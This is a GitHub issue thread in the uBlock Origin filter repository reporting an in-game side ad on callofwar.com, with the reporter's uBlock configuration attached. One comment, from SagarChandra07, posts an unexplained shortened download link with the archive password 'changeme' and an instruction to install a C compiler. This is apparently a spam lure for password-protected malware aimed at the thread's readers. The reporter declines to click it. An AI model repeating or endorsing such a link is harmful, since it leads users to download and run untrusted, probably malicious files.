### ISSUE TITLE
callofwar.com: nuisance

### ISSUE THREAD

**Issue by flamingrubys** [uBlockOrigin/uAssets#25464]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [ ] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://www.callofwar.com/game.php?bust=1`

### Category

nuisance

### Description

After 7 days of playing the site will bombard you with a side ad that is consitantly in the way of gameplay i created a new account and this seems to only happen for accounts once they reach excatly 7 days old, with text on the bottom telling you to buy something from their store to get rid of ads

### Other extensions used

none

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Firefox: 130
filterset (summary):
 network: 150247
 cosmetic: 48473
 scriptlet: 21038
 html: 1999
listset (total-discarded, last-updated):
 default:
  user-filters: 3-1, never
  ublock-filters: 40545-138, now
  ublock-badware: 11169-6, now
  ublock-privacy: 1253-22, now
  ublock-unbreak: 2538-1, now
  ublock-quick-fixes: 137-8, now
  easylist: 85650-186, now
  easyprivacy: 53101-62, now
  urlhaus-1: 25380-0, now
  plowe-0: 3546-993, now
filterset (user): [array of 3 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 2263 ms (selfie)
 maxAssetCacheWait: 440 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 30
 network:
  bytro.com: 1
  doubleclick.net: 3
  google-analytics.com: 2
  googlesyndication.com: 2
  helpshift.com: 1
  mgid.com: 2
  outbrain.com: 9
  taboola.com: 7
  yahoo.com: 1
  zemanta.com: 2
```
</details>

**Comment by SagarChandra07** [comment]
download
https://bit.ly/47P0Nvo
Pass: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by flamingrubys** [comment]
im uh not gonna click on a link i dont know what it does especially one thats encrypted also not code savvy
